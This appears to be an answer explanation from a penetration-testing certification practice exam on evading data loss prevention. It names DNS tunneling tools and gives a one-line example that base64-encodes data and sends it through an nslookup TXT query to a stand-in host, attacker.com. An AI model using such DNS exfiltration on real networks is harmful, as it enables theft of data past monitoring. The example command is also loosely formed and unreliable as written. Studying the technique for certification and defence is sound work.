DLP (Data Loss Prevention) systems monitor and block sensitive data transfers over HTTP, FTP, Email, and removable devices.
Encoding the data and exfiltrating through DNS (Option A):
DNS is often overlooked by DLP systems because it is required for network functionality.
Attackers use DNS tunneling (e.g., dnscat2, IODINE) to exfiltrate data inside DNS queries.
Example method
echo "Sensitive Data" | base64 | nslookup -q=TXT attacker.com
[Reference: CompTIA PenTest+ PT0-003 Official Study Guide - "Data Exfiltration Techniques", , , Incorrect options:, Option B (Cloud storage): Many organizations monitor file uploads to cloud storage., Option C (FTP): FTP is easily monitored and flagged by DLP solutions., Option D (Hashing and emailing): Emails are actively scanned by DLP policies., ]
Submit